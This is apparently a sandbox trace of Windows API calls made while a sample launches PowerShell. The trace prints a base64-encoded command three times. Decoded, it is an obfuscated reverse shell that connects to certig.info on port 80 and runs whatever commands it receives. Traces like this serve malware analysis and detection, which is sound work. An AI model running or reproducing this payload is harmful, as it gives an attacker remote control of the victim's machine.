	[0195.294] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.EXE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.296] GetLastError () returned 0x2
	[0195.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.296] GetLastError () returned 0x2
	[0195.296] SetErrorMode (uMode=0x1) returned 0x1
	[0195.296] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.BAT", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.299] GetLastError () returned 0x2
	[0195.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.300] GetLastError () returned 0x2
	[0195.300] SetErrorMode (uMode=0x1) returned 0x1
	[0195.300] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.CMD", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.302] GetLastError () returned 0x2
	[0195.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.302] GetLastError () returned 0x2
	[0195.302] SetErrorMode (uMode=0x1) returned 0x1
	[0195.303] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBS", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.305] GetLastError () returned 0x2
	[0195.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.305] GetLastError () returned 0x2
	[0195.305] SetErrorMode (uMode=0x1) returned 0x1
	[0195.305] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.307] GetLastError () returned 0x2
	[0195.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.308] GetLastError () returned 0x2
	[0195.308] SetErrorMode (uMode=0x1) returned 0x1
	[0195.308] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JS", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.310] GetLastError () returned 0x2
	[0195.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.310] GetLastError () returned 0x2
	[0195.310] SetErrorMode (uMode=0x1) returned 0x1
	[0195.311] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JSE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.313] GetLastError () returned 0x2
	[0195.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.313] GetLastError () returned 0x2
	[0195.313] SetErrorMode (uMode=0x1) returned 0x1
	[0195.313] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSF", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.315] GetLastError () returned 0x2
	[0195.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.316] GetLastError () returned 0x2
	[0195.316] SetErrorMode (uMode=0x1) returned 0x1
	[0195.316] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSH", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.318] GetLastError () returned 0x2
	[0195.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.318] GetLastError () returned 0x2
	[0195.318] SetErrorMode (uMode=0x1) returned 0x1
	[0195.319] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.MSC", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.321] GetLastError () returned 0x2
	[0195.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0195.321] GetLastError () returned 0x2
	[0195.321] SetErrorMode (uMode=0x1) returned 0x1
	[0195.321] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x629e3a0
	[0195.322] GetLastError () returned 0x2
	[0195.323] FindNextFileW (in: hFindFile=0x629e3a0, lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0195.323] GetLastError () returned 0x12
	[0195.323] FindClose (in: hFindFile=0x629e3a0 | out: hFindFile=0x629e3a0) returned 1
	[0195.324] SetErrorMode (uMode=0x1) returned 0x1
	[0195.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5fce6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0195.326] GetLastError () returned 0x12
	[0195.326] SetErrorMode (uMode=0x1) returned 0x1
	[0195.326] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x5fceb6c | out: lpFileInformation=0x5fceb6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800)) returned 1
	[0195.326] GetLastError () returned 0x12
	[0195.326] SetErrorMode (uMode=0x1) returned 0x1
	[0195.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.328] GetLastError () returned 0xcb
	[0195.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.467] GetLastError () returned 0xcb
	[0195.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.479] GetLastError () returned 0xcb
	[0195.556] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x783790, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x783790) returned 0x4550
	[0195.560] GetConsoleWindow () returned 0xa0266
	[0195.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.742] GetLastError () returned 0xcb
	[0195.742] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0195.742] GetLastError () returned 0x0
	[0195.757] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0195.757] GetLastError () returned 0x0
	[0195.759] CommandLineToArgvW (in: lpCmdLine=" -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAdwBFAEUAaAA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABNAHEAYQB1AHYAPQAoACQAYwB3AEUARQBoAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABGAGUAcwBSAGkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABlAHYATABhAGMAPQAkAE0AcQBhAHUAdgAuAFIAZQBhAGQAKAAkAEYAZQBzAFIAaQAsADAALAAkAEYAZQBzAFIAaQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGsAcgBGAFEAagA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARgBlAHMAUgBpACwAMAAsACQAZQB2AEwAYQBjACkAOwAkAHoAawBNAGEAaQA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAawByAEYAUQBqACAAMgA+ACYAMQApACkAOwAkAE0AcQBhAHUAdgAuAFcAcgBpAHQAZQAoACQAegBrAE0AYQBpACwAMAAsACQAegBrAE0AYQBpAC4ATABlAG4AZwB0AGgAKQA7ACQATQBxAGEAdQB2AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABjAHcARQBFAGgALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwB3AEUARQBoAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", pNumArgs=0x5fcec5c | out: pNumArgs=0x5fcec5c) returned 0x627ca40*=""
	[0195.759] GetLastError () returned 0x0
	[0195.760] lstrlenW (lpString="-encodedCommand") returned 15
	[0195.760] RtlMoveMemory (in: Destination=0x783790, Source=0x627ca52, Length=0x20 | out: Destination=0x783790) 
	[0195.760] lstrlenW (lpString="IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAdwBFAEUAaAA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABNAHEAYQB1AHYAPQAoACQAYwB3AEUARQBoAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABGAGUAcwBSAGkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABlAHYATABhAGMAPQAkAE0AcQBhAHUAdgAuAFIAZQBhAGQAKAAkAEYAZQBzAFIAaQAsADAALAAkAEYAZQBzAFIAaQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGsAcgBGAFEAagA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARgBlAHMAUgBpACwAMAAsACQAZQB2AEwAYQBjACkAOwAkAHoAawBNAGEAaQA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAawByAEYAUQBqACAAMgA+ACYAMQApACkAOwAkAE0AcQBhAHUAdgAuAFcAcgBpAHQAZQAoACQAegBrAE0AYQBpACwAMAAsACQAegBrAE0AYQBpAC4ATABlAG4AZwB0AGgAKQA7ACQATQBxAGEAdQB2AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABjAHcARQBFAGgALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwB3AEUARQBoAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==") returned 1736
	[0195.760] RtlMoveMemory (in: Destination=0x786f38, Source=0x627ca72, Length=0xd92 | out: Destination=0x786f38) 
	[0195.761] LocalFree (hMem=0x627ca40) returned 0x0
	[0195.762] GetConsoleTitleW (in: lpConsoleTitle=0x786f38, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0195.762] GetLastError () returned 0x0
	[0195.766] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAdwBFAEUAaAA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABNAHEAYQB1AHYAPQAoACQAYwB3AEUARQBoAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABGAGUAcwBSAGkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABlAHYATABhAGMAPQAkAE0AcQBhAHUAdgAuAFIAZQBhAGQAKAAkAEYAZQBzAFIAaQAsADAALAAkAEYAZQBzAFIAaQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGsAcgBGAFEAagA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARgBlAHMAUgBpACwAMAAsACQAZQB2AEwAYQBjACkAOwAkAHoAawBNAGEAaQA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAawByAEYAUQBqACAAMgA+ACYAMQApACkAOwAkAE0AcQBhAHUAdgAuAFcAcgBpAHQAZQAoACQAegBrAE0AYQBpACwAMAAsACQAegBrAE0AYQBpAC4ATABlAG4AZwB0AGgAKQA7ACQATQBxAGEAdQB2AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABjAHcARQBFAGgALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwB3AEUARQBoAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x7837a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2caa5f8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAdwBFAEUAaAA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABNAHEAYQB1AHYAPQAoACQAYwB3AEUARQBoAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABGAGUAcwBSAGkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABlAHYATABhAGMAPQAkAE0AcQBhAHUAdgAuAFIAZQBhAGQAKAAkAEYAZQBzAFIAaQAsADAALAAkAEYAZQBzAFIAaQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGsAcgBGAFEAagA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARgBlAHMAUgBpACwAMAAsACQAZQB2AEwAYQBjACkAOwAkAHoAawBNAGEAaQA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAawByAEYAUQBqACAAMgA+ACYAMQApACkAOwAkAE0AcQBhAHUAdgAuAFcAcgBpAHQAZQAoACQAegBrAE0AYQBpACwAMAAsACQAegBrAE0AYQBpAC4ATABlAG4AZwB0AGgAKQA7ACQATQBxAGEAdQB2AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABjAHcARQBFAGgALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwB3AEUARQBoAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessInformation=0x2caa5f8*(hProcess=0x6dc, hThread=0x6d8, dwProcessId=0x6dc, dwThreadId=0x1c4)) returned 1
	[0195.891] GetLastError () returned 0x0
	[0195.891] CloseHandle (hObject=0x6d8) returned 1
	[0195.891] GetLastError () returned 0x0
	[0195.891] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x783790, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x783790) returned 0x4550
	[0195.893] GetCurrentProcess () returned 0xffffffff
	[0195.893] GetLastError () returned 0x0
	[0195.893] GetCurrentProcess () returned 0xffffffff
	[0195.893] GetLastError () returned 0x0
